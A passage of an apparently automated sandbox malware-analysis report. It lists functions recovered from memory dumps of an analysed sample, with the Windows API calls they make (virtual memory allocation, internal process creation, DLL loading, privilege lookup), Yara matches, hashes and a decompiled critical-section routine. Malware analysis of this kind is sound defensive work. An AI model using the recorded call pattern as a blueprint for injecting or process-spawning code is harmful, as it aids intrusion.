                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E0156FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                        				void* _t7;
                                                                        				intOrPtr _t9;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr* _t12;
                                                                        				intOrPtr* _t13;
                                                                        				intOrPtr _t14;
                                                                        				intOrPtr* _t15;
                                                                        
                                                                        				_t13 = __edx;
                                                                        				_push(_a4);
                                                                        				_t14 =  *[fs:0x18];
                                                                        				_t15 = _t12;
                                                                        				_t7 = E0151CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                        				_push(_t13);
                                                                        				E01565720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                        				_t9 =  *_t15;
                                                                        				if(_t9 == 0xffffffff) {
                                                                        					_t10 = 0;
                                                                        				} else {
                                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                        				}
                                                                        				_push(_t10);
                                                                        				_push(_t15);
                                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                        				return E01565720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                        			}











                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0156FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0156FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0156FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: f70fc36faff4db5ab8ca2340100ec664c037d29f894bf6982a54a8fc35931828
                                                                        • Instruction ID: bd1056a5e4b854268963cd4130b476993785db9130df086ebb106986c67264fe
                                                                        • Opcode Fuzzy Hash: f70fc36faff4db5ab8ca2340100ec664c037d29f894bf6982a54a8fc35931828
                                                                        • Instruction Fuzzy Hash: B8F0C8366406027FE6211A45DC01E237F5EEB84B70F240319F6245A5E1E9A2B82086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00943B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00943B87,007A002E,00000000,00000060,00000000,00000000), ref: 009481FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction ID: aa7e2539e38242b0ea86768629304d15aacd82537efd590a2fd2a156d02cb572
                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction Fuzzy Hash: D7F0B6B2201108ABCB08DF88DC85EEB77ADAF8C754F158248FA0D97241C630E8118BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtReadFile.NTDLL(00943D42,5E972F59,FFFFFFFF,00943A01,?,?,00943D42,?,00943A01,FFFFFFFF,5E972F59,00943D42,?,00000000), ref: 009482A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
                                                                        • Instruction ID: 5bfe15ba84d65610a33a69f4c18f71913ae2f00e26080cbacc5965d9edd254e6
                                                                        • Opcode Fuzzy Hash: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
                                                                        • Instruction Fuzzy Hash: CF110C72200104AFCB14DF98CC85EEB77ADEF8C754F158558FA1D97241CA30E911CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtReadFile.NTDLL(00943D42,5E972F59,FFFFFFFF,00943A01,?,?,00943D42,?,00943A01,FFFFFFFF,5E972F59,00943D42,?,00000000), ref: 009482A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction ID: 34c3c8528d2d8e2556d1e40bc6370c3bf87f560f0a76a8df591ae48e5585cf97
                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction Fuzzy Hash: 00F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00932D11,00002000,00003000,00000004), ref: 009483C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
                                                                        • Instruction ID: dc8817064799b9daec38ef62bd59c46ff40e98076c44abbb52966b3cd13e0e32
                                                                        • Opcode Fuzzy Hash: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
                                                                        • Instruction Fuzzy Hash: 7DF0F8B5200208ABCB14DF99DC95EAB77ADBF88350F158159FE1897241C630E910CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00932D11,00002000,00003000,00000004), ref: 009483C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction ID: ed768e751b69b80bb0d2b9d11f2199c78604c323297a836d4f50e57c1548ae1b
                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction Fuzzy Hash: 77F015B2200208ABCB14DF89CC81EEB77ADAF88750F118148FE0897281CA30F810CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtClose.NTDLL(00943D20,?,?,00943D20,00000000,FFFFFFFF), ref: 00948305
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction ID: 342b837701356767723bbb0722e9a392e9a48463a1f25bd66b3e4328f203194d
                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction Fuzzy Hash: 96D012756002146BD710EF98CC45FD7775CEF44750F154455BA185B282C930F90086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 93313b24967bab71e78f30cf6be6478439608d54d25507ffccdef9ddf9bcfb7b
                                                                        • Instruction ID: 9f999b5ca5f808807c1b8194297452f856435f2b4632f4e0179c59a2b307fd97
                                                                        • Opcode Fuzzy Hash: 93313b24967bab71e78f30cf6be6478439608d54d25507ffccdef9ddf9bcfb7b
                                                                        • Instruction Fuzzy Hash: 5190027224100413F11161594504707000DD7D0285F95C496A0815558DA696D962B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 75659476e317944544a965dbc7845ef25c9c0c6af9b0c9adbfd1410a72354ede
                                                                        • Instruction ID: fd16f48a45c29eaa7323626385093723df5cee4758e0913bcc10875f048f42bb
                                                                        • Opcode Fuzzy Hash: 75659476e317944544a965dbc7845ef25c9c0c6af9b0c9adbfd1410a72354ede
                                                                        • Instruction Fuzzy Hash: 8F900262282041527545B1594404507400AE7E0285B95C096A1805950C9566E866E661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1c4d982808d4d1a86debf0fc039793630af484f185bee296672990bfab56fec5
                                                                        • Instruction ID: 4cd9b8a705b5025385a602c01a27f61052527825ab2a679f783d7a43f324101c
                                                                        • Opcode Fuzzy Hash: 1c4d982808d4d1a86debf0fc039793630af484f185bee296672990bfab56fec5
                                                                        • Instruction Fuzzy Hash: 479002A238100442F10061594414B060009D7E1345F55C099E1455554D9659DC627166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a22440e8d0175620c7eab07616c76271b6738150f99ac4eb3db78054f9918a6d
                                                                        • Instruction ID: f83fd5c2e10bd357fa0735a9e34b312efa24a53eb75040e137af0bf12a870a58
                                                                        • Opcode Fuzzy Hash: a22440e8d0175620c7eab07616c76271b6738150f99ac4eb3db78054f9918a6d
                                                                        • Instruction Fuzzy Hash: D09002A224200003610571594414616400ED7E0245F55C0A5E1405590DD565D8A17165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b3aa9c0af96c758655360145dc2d4319ce17fd41fb46303c6e1cf1d9af9eaad3
                                                                        • Instruction ID: 82bd013e8cde6cb74e42e8ae951c1236e9dde98a56e5b693e7da7ca6a87fe988
                                                                        • Opcode Fuzzy Hash: b3aa9c0af96c758655360145dc2d4319ce17fd41fb46303c6e1cf1d9af9eaad3
                                                                        • Instruction Fuzzy Hash: 6D9002B224100402F140715944047460009D7D0345F55C095A5455554E9699DDE576A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 85bb1994aed20014ae30a650200d549e29a8c14f105cb65837b2ebf86748247b
                                                                        • Instruction ID: 89a6dd9b85836e5c7609d74f4a16bfa7448cc14352c5ad8b92aca51b241b4c09
                                                                        • Opcode Fuzzy Hash: 85bb1994aed20014ae30a650200d549e29a8c14f105cb65837b2ebf86748247b
                                                                        • Instruction Fuzzy Hash: 90900266251000032105A5590704507004AD7D5395755C0A5F1406550CE661D8716161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00946F78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00946F78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00933B93), ref: 009484ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00933B93), ref: 009484ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009372BA
                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009372DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00948584
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00939B82
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00943506,?,00943C7F,00943C7F,?,00943506,?,?,?,?,?,00000000,00000000,?), ref: 009484AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00948584
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0093CCC0,?,?), ref: 0094703C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
                                                                        • Instruction ID: 961536378233423575f3245a9440a7999ecc541f73ed2b77b43b8edadfc5ae74
                                                                        • Opcode Fuzzy Hash: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
                                                                        • Instruction Fuzzy Hash: BCF09B7234121077D7306658DC43FE7725CDB95B50F250019FB49AB2C1D9D5F90246E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0093CCC0,?,?), ref: 0094703C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                        • Instruction ID: 35d2c9dc660d0e516f74e9ef77ed164b07f1518be9fd5fa5068812b35c88db45
                                                                        • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                        • Instruction Fuzzy Hash: B2E092333813043AE33065A9AC03FA7B39CCBC1B20F140026FA0DEB2C1D595F90142A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00943506,?,00943C7F,00943C7F,?,00943506,?,?,?,?,?,00000000,00000000,?), ref: 009484AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction ID: d3ba9f9b5ec78dc60da7893c59d9dbb559093720239032397c4bbe7ef0620eac
                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction Fuzzy Hash: 48E012B1200208ABDB14EF99CC41EAB77ACAF88650F118558FA085B282CA30F9108AF0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0093CF92,0093CF92,?,00000000,?,?), ref: 00948650
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction ID: f7b0ae9581c6737ac22d2750667720e43786725cfc3cc3f5ab07f30e320e5f2c
                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction Fuzzy Hash: CFE01AB16002086BDB10EF49CC85EEB37ADAF88650F018154FA085B281C930E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00937C63,?), ref: 0093D42B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction ID: 7d62ec106e90a9cce5b8fbfb8313f84dfaf0c070633cae365d2c5e454882c3fd
                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction Fuzzy Hash: 1BD0A7717903043BE610FAA49C07F2732CD9B45B00F494064F948D73C3D960F5004561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a7eb6f2ba4f52cf2fa894df0dde403e9536211bdb6f01f146efb0c44b96c1a1d
                                                                        • Instruction ID: e0b4307588730cd244b7cf62f8a995f1cbcf09bd28c1d1e96cc6bc57207f27f2
                                                                        • Opcode Fuzzy Hash: a7eb6f2ba4f52cf2fa894df0dde403e9536211bdb6f01f146efb0c44b96c1a1d
                                                                        • Instruction Fuzzy Hash: 25B09BB29414C5C5F711D76046087177904F7D0745F16C0E5D1420645A4778D0A1F6B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 53%
                                                                        			E04C1FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                        				void* _t7;
                                                                        				intOrPtr _t9;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr* _t12;
                                                                        				intOrPtr* _t13;
                                                                        				intOrPtr _t14;
                                                                        				intOrPtr* _t15;
                                                                        
